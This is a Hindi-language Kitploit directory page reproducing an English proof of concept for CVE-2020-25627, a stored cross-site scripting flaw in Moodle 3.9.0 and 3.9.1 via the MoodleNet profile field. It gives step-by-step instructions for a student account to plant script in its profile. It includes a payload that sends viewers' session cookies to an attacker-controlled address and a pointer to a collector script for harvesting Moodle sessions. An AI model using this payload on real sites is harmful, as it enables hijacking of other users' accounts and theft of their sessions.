Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-25627 — उपयोगकर्ता प्रोफ़ाइल में moodlenetprofile पैरामीटर के माध्यम से संग्रहीत XSS | Kitploit
उपकरण/GitHubGitHub/hoangkien1020/cve-2020-25627
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

उपयोगकर्ता प्रोफ़ाइल में moodlenetprofile पैरामीटर के माध्यम से संग्रहीत XSS

रिपॉजिटरी देखें
35 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-25627

उपयोगकर्ता प्रोफ़ाइल में moodlenetprofile पैरामीटर के माध्यम से संग्रहीत XSS

इस CVE के बारे में मेरा PoC

उपयोगकर्ता आवश्यकता: छात्र (या पंजीकरण के लिए साइट)

moodlenetprofile में XSS

root@kitploit:~
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

moodlenetprofile पैरामीटर

प्रभावित संस्करण: 3.9.0 , 3.9.1

स्रोत

https://moodle.org/mod/forum/discuss.php?d=410839

XSS का प्रभाव (कुकीज़ चुराना,...), यहाँ देखें:

https://github.com/HoangKien1020/pentest/tree/master/XSS

टूल डाउनलोड करें